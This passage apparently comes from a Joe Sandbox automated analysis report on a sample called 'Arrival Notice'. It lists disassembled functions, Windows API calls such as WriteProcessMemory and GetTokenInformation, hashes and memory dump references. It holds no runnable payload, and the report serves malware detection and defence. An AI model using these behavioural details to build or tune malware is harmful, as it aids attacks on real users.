                  • Opcode Fuzzy Hash: f04c96c33b9c1f428e0e53c72baca924f567b4a9fe373344a3361e1fe341acc4
                  • Instruction Fuzzy Hash: 0A215EB0802205EBDB129F64EC48BAD7B68BB01325F16062FF810A61F0D3709C62CB98
                  Function 00415711 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _memcmp
                  • String ID:
                  • API String ID: 2931989736-0
                  • Opcode ID: cbfdba1eee8ac64dfc6792c84c070030632fd7c60486dccb351119d8280747f2
                  • Instruction ID: fe71e00ec2598c990d763bc30208a907cda89bebedf613b36bb9c55d684a35e0
                  • Opcode Fuzzy Hash: cbfdba1eee8ac64dfc6792c84c070030632fd7c60486dccb351119d8280747f2
                  • Instruction Fuzzy Hash: 2D01D6B6241605FBE20855109E83FFB634C9BA13A4F100033FD149E782F628ED5582A9
                  Function 003E2DF8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(?,?,?,003DF2DE,003E3863,00481444,?,003CFDF5,?,?,003BA976,00000010,00481440,003B13FC,?,003B13C6), ref: 003E2DFD
                  • _free.LIBCMT ref: 003E2E32
                  • _free.LIBCMT ref: 003E2E59
                  • SetLastError.KERNEL32(00000000,003B1129), ref: 003E2E66
                  • SetLastError.KERNEL32(00000000,003B1129), ref: 003E2E6F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorLast$_free
                  • String ID:
                  • API String ID: 3170660625-0
                  • Opcode ID: 670a2553f743b6dc36803a4f25675cad7a31355a7d5c453bedd1161b75d042ef
                  • Instruction ID: 551daf2742daf37eb54addc963efa15696d425c82fb137740a5bb0cf74a9333f
                  • Opcode Fuzzy Hash: 670a2553f743b6dc36803a4f25675cad7a31355a7d5c453bedd1161b75d042ef
                  • Instruction Fuzzy Hash: DD0128362466B467C61327776C8AD2B265DEBC27B5B364738F825A72D3EF348C014120
                  Function 0041000E Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON
                  Download Yara Rule
                  APIs
                  • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0040FF41,80070057,?,?,?,0041035E), ref: 0041002B
                  • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0040FF41,80070057,?,?), ref: 00410046
                  • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0040FF41,80070057,?,?), ref: 00410054
                  • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0040FF41,80070057,?), ref: 00410064
                  • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0040FF41,80070057,?,?), ref: 00410070
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: From$Prog$FreeStringTasklstrcmpi
                  • String ID:
                  • API String ID: 3897988419-0
                  • Opcode ID: fd6b648eba38f9f8bd7219db86f591f7b30b0c6a86e18eea44bcdcb61f74d4ff
                  • Instruction ID: d5ae64105c6dd5e41416765e0f3065587643b923a075812fb0cac6ef3ddcc157
                  • Opcode Fuzzy Hash: fd6b648eba38f9f8bd7219db86f591f7b30b0c6a86e18eea44bcdcb61f74d4ff
                  • Instruction Fuzzy Hash: 40018476601204BFDB505F64EC44BEA7EADEB48752F144125F905D2210E7B5DD8087A8
                  Function 0041E97B Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON
                  Download Yara Rule
                  APIs
                  • QueryPerformanceCounter.KERNEL32(?), ref: 0041E997
                  • QueryPerformanceFrequency.KERNEL32(?), ref: 0041E9A5
                  • Sleep.KERNEL32(00000000), ref: 0041E9AD
                  • QueryPerformanceCounter.KERNEL32(?), ref: 0041E9B7
                  • Sleep.KERNEL32 ref: 0041E9F3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: PerformanceQuery$CounterSleep$Frequency
                  • String ID:
                  • API String ID: 2833360925-0
                  • Opcode ID: 58ff468892bb207cf4a7397d2d52c863493ca4a54d1cfc5a31050d4897031aae
                  • Instruction ID: 1b1f75f9aba93b7270d96b2ce4bb55bb44bd7a93de36034a5b1d7df1f80aa65e
                  • Opcode Fuzzy Hash: 58ff468892bb207cf4a7397d2d52c863493ca4a54d1cfc5a31050d4897031aae
                  • Instruction Fuzzy Hash: FB019679C1252DDBCF409FE5DD896DDBB78FF09700F040556E902B2250DB345591CB6A
                  Function 004110F9 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00411114
                  • GetLastError.KERNEL32(?,00000000,00000000,?,?,00410B9B,?,?,?), ref: 00411120
                  • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00410B9B,?,?,?), ref: 0041112F
                  • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00410B9B,?,?,?), ref: 00411136
                  • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0041114D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                  • String ID:
                  • API String ID: 842720411-0
                  • Opcode ID: 88ef722369e86cbccdf55b233ae7c3fa7af6102c37e01f6a8cfe8e88353fdf4d
                  • Instruction ID: d461f6536e3af6872cce6ef614f7a6cb97bee86bd28850123ba251c387de486c
                  • Opcode Fuzzy Hash: 88ef722369e86cbccdf55b233ae7c3fa7af6102c37e01f6a8cfe8e88353fdf4d
                  • Instruction Fuzzy Hash: CA018179101205BFDB514FA5DC89EAB3F6EEF8A364B140425FA41C3360DB31DC408E64
                  Function 00410FB4 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00410FCA
                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00410FD6
                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00410FE5
                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00410FEC
                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00411002
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: HeapInformationToken$AllocErrorLastProcess
                  • String ID:
                  • API String ID: 44706859-0
                  • Opcode ID: beb1e71e938f34caafe249a6dde5ec763be184e584b23c24e4e1e8302b218056
                  • Instruction ID: 6824c7aeb47757e8c99c0ded387156268ec516e614194524fbd4980db257fcc8
                  • Opcode Fuzzy Hash: beb1e71e938f34caafe249a6dde5ec763be184e584b23c24e4e1e8302b218056
                  • Instruction Fuzzy Hash: 63F06D39642301EBDB214FA4DC8DF973FADEF8A7A2F144425FA45D7261CA74DC808A64
                  Function 00411014 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0041102A
                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00411036
                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00411045
                  • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0041104C
                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00411062
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: HeapInformationToken$AllocErrorLastProcess
                  • String ID:
                  • API String ID: 44706859-0
                  • Opcode ID: f24d068d2cc723e1667697a87d16c4a286c9e2ac6b145e779fb9ce1d710fd2ab
                  • Instruction ID: 298e0eee8e23ba741938352428b7c0acd832d21d05df24b774bb0dacd036082b
                  • Opcode Fuzzy Hash: f24d068d2cc723e1667697a87d16c4a286c9e2ac6b145e779fb9ce1d710fd2ab
                  • Instruction Fuzzy Hash: 0AF06D39642301EBDB215FA5EC89F973FADEF8A761F140425FA45E7260CA74D880CA64
                  Function 0042030F Relevance: 7.5, APIs: 6, Instructions: 41COMMON
                  Download Yara Rule
                  APIs
                  • CloseHandle.KERNEL32(?,?,?,?,0042017D,?,004232FC,?,00000001,003F2592,?), ref: 00420324
                  • CloseHandle.KERNEL32(?,?,?,?,0042017D,?,004232FC,?,00000001,003F2592,?), ref: 00420331
                  • CloseHandle.KERNEL32(?,?,?,?,0042017D,?,004232FC,?,00000001,003F2592,?), ref: 0042033E
                  • CloseHandle.KERNEL32(?,?,?,?,0042017D,?,004232FC,?,00000001,003F2592,?), ref: 0042034B
                  • CloseHandle.KERNEL32(?,?,?,?,0042017D,?,004232FC,?,00000001,003F2592,?), ref: 00420358
                  • CloseHandle.KERNEL32(?,?,?,?,0042017D,?,004232FC,?,00000001,003F2592,?), ref: 00420365
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CloseHandle
                  • String ID:
                  • API String ID: 2962429428-0
                  • Opcode ID: 2ef1bedea092c77b535c38531033b8149edd492b2e79b7c56d63eeda09d97172
                  • Instruction ID: 28480f2d4ca281b22cc3b23bece8a50d137013e8f6cd9bedd9095942bb4ea0a0
                  • Opcode Fuzzy Hash: 2ef1bedea092c77b535c38531033b8149edd492b2e79b7c56d63eeda09d97172
                  • Instruction Fuzzy Hash: FA01E272900B218FC7309F66E880403FBF5BF503053048A3FD19252A32C374A944CF84
                  Function 003ED73A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 003ED752
                    • Part of subcall function 003E29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000), ref: 003E29DE
                    • Part of subcall function 003E29C8: GetLastError.KERNEL32(00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000,00000000), ref: 003E29F0
                  • _free.LIBCMT ref: 003ED764
                  • _free.LIBCMT ref: 003ED776
                  • _free.LIBCMT ref: 003ED788
                  • _free.LIBCMT ref: 003ED79A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 519c8ffdd39dff2afe00e43fc4f1cc37398a30c134ef3a90c70d0b50ae2527cd
                  • Instruction ID: cec21d205636ca1372afd0bd62933e8d5c59629177eeb85864c62c3251924f4e
                  • Opcode Fuzzy Hash: 519c8ffdd39dff2afe00e43fc4f1cc37398a30c134ef3a90c70d0b50ae2527cd
                  • Instruction Fuzzy Hash: DBF062725002A8AB8623FF66F9C2C1B77DDBB05311B971A19F048EB582C734FC808664
                  Function 00415C44 Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON
                  Download Yara Rule
                  APIs
                  • GetDlgItem.USER32(?,000003E9), ref: 00415C58
                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00415C6F
                  • MessageBeep.USER32(00000000), ref: 00415C87
                  • KillTimer.USER32(?,0000040A), ref: 00415CA3
                  • EndDialog.USER32(?,00000001), ref: 00415CBD
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                  • String ID:
                  • API String ID: 3741023627-0
                  • Opcode ID: e7436783af143cbac98ae4ea7b90080f698841bc5094c56f32b6977ace0c7dd6
                  • Instruction ID: 3c6bea2b730c8b136a1e7d10de393e1dc0dc1af6744e02b45c9489e77e498004
                  • Opcode Fuzzy Hash: e7436783af143cbac98ae4ea7b90080f698841bc5094c56f32b6977ace0c7dd6
                  • Instruction Fuzzy Hash: AE01DB34501704DBFB205F10DD8EFD677B8BB01705F04016AA643A10E1EBF459848A94
                  Function 003E22A0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 003E22BE
                    • Part of subcall function 003E29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000), ref: 003E29DE
                    • Part of subcall function 003E29C8: GetLastError.KERNEL32(00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000,00000000), ref: 003E29F0
                  • _free.LIBCMT ref: 003E22D0
                  • _free.LIBCMT ref: 003E22E3
                  • _free.LIBCMT ref: 003E22F4
                  • _free.LIBCMT ref: 003E2305
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 4e545e1385c031b16d6f4e733092daf4947b4d26a4e491869107203e33453393
                  • Instruction ID: d3bc90bad5736fa80d0ce0f8d08ac4018d015edcf5fcc961fbd0b052a742ea69
                  • Opcode Fuzzy Hash: 4e545e1385c031b16d6f4e733092daf4947b4d26a4e491869107203e33453393
                  • Instruction Fuzzy Hash: 4FF030718101748B8663BF65BC4284E3B6CB7197617025A6FF514DA2F2C73504629BAD
                  Function 003C95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON
                  Download Yara Rule
                  APIs
                  • EndPath.GDI32(?), ref: 003C95D4
                  • StrokeAndFillPath.GDI32(?,?,004071F7,00000000,?,?,?), ref: 003C95F0
                  • SelectObject.GDI32(?,00000000), ref: 003C9603
                  • DeleteObject.GDI32 ref: 003C9616
                  • StrokePath.GDI32(?), ref: 003C9631
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Path$ObjectStroke$DeleteFillSelect
                  • String ID:
                  • API String ID: 2625713937-0
                  • Opcode ID: cace0b6024d00fef95c9ec752c5fe9ff624e4d70875e7d4c35776e4c628ca600
                  • Instruction ID: 7977576d02372222bad48979c4a960df4e50ddbecebf4d638243d8709a8a3c57
                  • Opcode Fuzzy Hash: cace0b6024d00fef95c9ec752c5fe9ff624e4d70875e7d4c35776e4c628ca600
                  • Instruction Fuzzy Hash: 10F03C74006604EBDB265F65ED5CB683B69AB02332F09863EF425990F0C73489A2DF28
                  Function 003E0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: __freea$_free
                  • String ID: a/p$am/pm
                  • API String ID: 3432400110-3206640213
                  • Opcode ID: 3a4e92ae1d25d360358f1745c56333c17df01c79f1fde8c93d66a4f182bf3857
                  • Instruction ID: 98da8e62733333979c1fefc6bee7e4f53d987c9975e107195a5fb7126805962d
                  • Opcode Fuzzy Hash: 3a4e92ae1d25d360358f1745c56333c17df01c79f1fde8c93d66a4f182bf3857
                  • Instruction Fuzzy Hash: DBD117759002A6CACB2B9F6AC845BFEB7B4FF05300F250359E601ABAD5D3759D80CB91
                  Function 004361D0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 324COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003D0242: EnterCriticalSection.KERNEL32(0048070C,00481884,?,?,003C198B,00482518,?,?,?,003B12F9,00000000), ref: 003D024D
                    • Part of subcall function 003D0242: LeaveCriticalSection.KERNEL32(0048070C,?,003C198B,00482518,?,?,?,003B12F9,00000000), ref: 003D028A
                    • Part of subcall function 003D00A3: __onexit.LIBCMT ref: 003D00A9
                  • __Init_thread_footer.LIBCMT ref: 00436238
                    • Part of subcall function 003D01F8: EnterCriticalSection.KERNEL32(0048070C,?,?,003C8747,00482514), ref: 003D0202
                    • Part of subcall function 003D01F8: LeaveCriticalSection.KERNEL32(0048070C,?,003C8747,00482514), ref: 003D0235
                    • Part of subcall function 0042359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 004235E4
                    • Part of subcall function 0042359C: LoadStringW.USER32(00482390,?,00000FFF,?), ref: 0042360A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                  • String ID: x#H$x#H$x#H
                  • API String ID: 1072379062-375009828
                  • Opcode ID: eb6d41e2c1166dd08c64ac024e2a4525085994e7856e0e759800c0a9445efc18
                  • Instruction ID: 045c7df757f5fabf8a05aead193ae9ed560000395ccd0828aa668e96950e8a4c
                  • Opcode Fuzzy Hash: eb6d41e2c1166dd08c64ac024e2a4525085994e7856e0e759800c0a9445efc18
                  • Instruction Fuzzy Hash: F6C19E71A0010AAFCB15EF58D890EBEB7B9EF48304F11806AFA059B291DB74ED45CB94
                  Function 003E8A61 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 124COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 003E8B6E
                  • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 003E8B7A
                  • __dosmaperr.LIBCMT ref: 003E8B81
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ByteCharErrorLastMultiWide__dosmaperr
                  • String ID: .=
                  • API String ID: 2434981716-4056814303
                  • Opcode ID: b5044acd4f07b42fd4b4f1f8f9dea9930a291e049bfbb392bd6da1e51f60640d
                  • Instruction ID: e31c710e1f71d22358cc15dea5cf6f4013c04c17b4e8ca17fa4620acd23ab0f3
                  • Opcode Fuzzy Hash: b5044acd4f07b42fd4b4f1f8f9dea9930a291e049bfbb392bd6da1e51f60640d
                  • Instruction Fuzzy Hash: CA417E70D040E6AFDB269F16C880A7D7F96DF45304B1987A9F48D8B6C2DE318C028794
                  Function 00412716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0041B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004121D0,?,?,00000034,00000800,?,00000034), ref: 0041B42D
                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00412760
